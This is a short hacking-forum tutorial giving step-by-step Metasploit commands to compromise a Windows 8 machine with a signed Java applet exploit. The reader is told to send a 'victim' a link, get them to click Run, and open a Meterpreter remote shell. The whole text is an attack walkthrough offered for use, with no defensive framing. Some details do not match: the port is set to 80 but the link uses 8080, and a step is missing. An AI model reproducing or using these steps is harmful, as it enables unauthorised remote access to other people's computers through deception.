Hack Windows 8 With Metasploit In 2 mins

1). Backtrack R3 Operating System
2). Metasploit
3). Exploit


So lets' Start.....

1). Start Backtrack in GUI mode. by typing start x

2). Open Terminal

3). Type msfconcole

4). Then Type msf: use exploit/multi/browser/java_signed_applet

[center][Image: 11660074.jpg][/center]


5). To Show options Type msf: show options

[center][Image: 11660075.jpg][/center]


6). After This You want set LHOST means Localhost. First check you Ip from network connections if you are doing this live check your isp ip address.

To set LHOST Type msf: set LHOST eg.192.168.1.27

[center][Image: 11660076.jpg][/center]


7). Then you want to set LPORT means Port of localhost.

TYPE msf: set LPORT 80

[center][Image: 11660078.jpg][/center]


9.) Then Set URIPATH.

Type msf: set URIPATH /

[center][Image: 11660080.jpg][/center]


Now Everything is Set.

Now Type msf : exploit 

[center][Image: 11660116.jpg][/center]

After This Go to victim Machine Or give him your ip address. (like this: 192.168.1.27:8080)

[center][Image: 11660117.jpg][/center]


When He/she open your link he/she see this massage on screen click On RUN and you can see in bt Session is opened

[center][Image: 11660119.jpg][/center]


To See sessions type msf: sessions -i

[center][Image: 11660120.jpg][/center]


To Open Meterpreter type msf: sessions -i 1 (1 is session id)

[center][Image: 11660126.jpg][/center]

[center][Image: 11660127.jpg][/center]

There you go Windows 8 is hacked :lol: 
If you like the tutorial then please reply here